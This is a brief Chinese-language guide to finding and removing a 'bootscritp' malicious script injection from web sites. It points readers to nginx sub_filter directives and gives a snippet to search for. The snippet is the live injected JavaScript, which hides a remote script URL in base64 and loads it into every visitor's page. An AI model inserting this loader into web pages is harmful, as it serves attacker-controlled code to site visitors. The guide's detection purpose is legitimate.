关于 bootscritp 恶意注入解决方法
所有站点都被注入
首先检查 /etc/nginx/nginx.conf 以及 sites-enabled/ 目录下的所有配置文件,查看是否有 sub_filter、subs_filter 指令。
单个站点被注入
请在站点目录查询一下内容(取部分)。
document.cookie="hasVisited178a=1;Max-Age=86400;Path=/";(function(){var hm=document.createElement("script");hm.src=atob("aHR0cHM6Ly9ib290c2NyaXRwLmNvbS9saWIvanF1ZXJ5LzQuNy4yL2pxdWVyeS5taW4uanM=");var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm,s);})()